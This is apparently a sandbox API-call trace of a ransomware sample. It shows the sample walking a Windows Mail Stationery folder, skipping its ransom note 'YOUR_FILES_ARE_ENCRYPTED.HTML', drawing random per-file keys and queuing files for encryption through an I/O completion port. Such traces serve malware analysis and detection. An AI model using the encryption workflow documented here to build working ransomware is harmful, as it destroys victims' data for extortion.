[0170.746] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="56") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="37") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="59") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EC") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="07") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="FE") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CF") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="98") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="40") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="E6") returned 2 [0170.746] wsprintfW 
(in: param_1=0x4ebd182, param_2="%02X" | out: param_1="25") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DB") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="83") returned 2 [0170.746] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="5A") returned 2 [0170.747] lstrcpyW (in: lpString1=0x76f1104, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" [0170.747] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x76e1050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.747] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76e1050, lpOverlapped=0x76e1050) returned 1 [0170.747] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f0b7e4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="HANDPR~1.HTM")) returned 1 [0170.747] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0170.747] lstrcmpW (lpString1="Hand Prints.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.747] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0170.747] lstrlenW (lpString=".htm") 
returned 4 [0170.747] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0170.748] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0170.748] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=235) returned 1 [0170.748] CloseHandle (hObject=0x594) returned 1 [0170.748] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827f32dc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HandPrints.jpg", cAlternateFileName="HANDPR~1.JPG")) returned 1 [0170.748] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0170.748] lstrcmpW (lpString1="HandPrints.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.748] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0170.748] lstrlenW (lpString=".jpg") returned 4 [0170.748] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0170.748] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.748] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0170.749] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4222) returned 1 [0170.749] GetProcessHeap () returned 0x270000 [0170.749] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0170.751] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C5") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="F2") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="3B") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="07") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="B4") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="0F") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="E2") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="A8") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="FB") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="66") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A6") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="02") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="80") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="B7") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="AB") 
returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="B5") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="C2") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="08") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="2B") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="02") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="2B") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="D1") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="12") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="21") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="23") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="E5") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="CF") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F3") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="0E") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DA") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="52") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7C") returned 2 [0170.753] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" [0170.753] CreateIoCompletionPort 
(FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.753] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0170.753] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f57aa4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="ORANGE~1.HTM")) returned 1 [0170.753] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0170.753] lstrcmpW (lpString1="Orange Circles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.753] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0170.753] lstrlenW (lpString=".htm") returned 4 [0170.753] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0170.753] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0170.753] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0170.754] CloseHandle 
(hObject=0x58c) returned 1 [0170.754] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8283f59c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="ORANGE~1.JPG")) returned 1 [0170.754] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0170.754] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.754] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0170.754] lstrlenW (lpString=".jpg") returned 4 [0170.754] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0170.754] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0170.754] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6381) returned 1 [0170.754] GetProcessHeap () returned 0x270000 [0170.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a450 [0170.758] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="0C") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd116, 
param_2="%02X" | out: param_1="31") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="C8") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="CC") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="EA") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="CD") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="41") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="2D") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="E9") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="B2") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="C5") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C2") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A3") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="CC") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="80") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="59") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="40") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9C") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="9A") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="08") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="48") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EF") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="21") returned 2 [0170.759] wsprintfW 
(in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="71") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="A7") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A4") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="78") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="26") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="10") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="D4") returned 2 [0170.760] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="1E") returned 2 [0170.760] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="05") returned 2 [0170.760] lstrcpyW (in: lpString1=0x751a504, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" [0170.760] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x750a450, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.760] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a450, lpOverlapped=0x750a450) returned 1 [0170.760] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41fa3d64, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.htm", 
cAlternateFileName="")) returned 1 [0170.760] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0170.760] lstrcmpW (lpString1="Peacock.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.761] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0170.761] lstrlenW (lpString=".htm") returned 4 [0170.761] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0170.761] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0170.761] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0170.761] CloseHandle (hObject=0x598) returned 1 [0170.761] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828d7b1c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0170.762] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0170.762] lstrcmpW (lpString1="Peacock.jpg", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.762] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0170.762] lstrlenW (lpString=".jpg") returned 4 [0170.762] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0170.762] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0170.762] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=5115) returned 1 [0170.762] GetProcessHeap () returned 0x270000 [0170.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75325a8 [0170.766] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FD") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="60") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="2C") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C3") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="3A") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="AA") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="29") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="38") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="5C") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="F1") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | 
out: param_1="4B") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="F7") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BB") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="76") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="00") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="2F") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="BB") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="77") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B9") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0E") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="0A") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="3B") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="66") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="5A") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F2") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="F3") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="3F") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="CB") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="6A") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="71") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="DE") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="02") returned 2 [0170.768] lstrcpyW (in: 
lpString1=0x754265c, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" [0170.768] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x75325a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.768] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75325a8, lpOverlapped=0x75325a8) returned 1 [0170.768] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ff0024, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0170.768] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0170.768] lstrcmpW (lpString1="Roses.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.768] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0170.768] lstrlenW (lpString=".htm") returned 4 [0170.768] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0170.768] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), 
dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0170.769] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=233) returned 1 [0170.769] CloseHandle (hObject=0x5d8) returned 1 [0170.769] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828fdc7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0170.769] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0170.769] lstrcmpW (lpString1="Roses.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.769] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0170.769] lstrlenW (lpString=".jpg") returned 4 [0170.769] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0170.769] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, 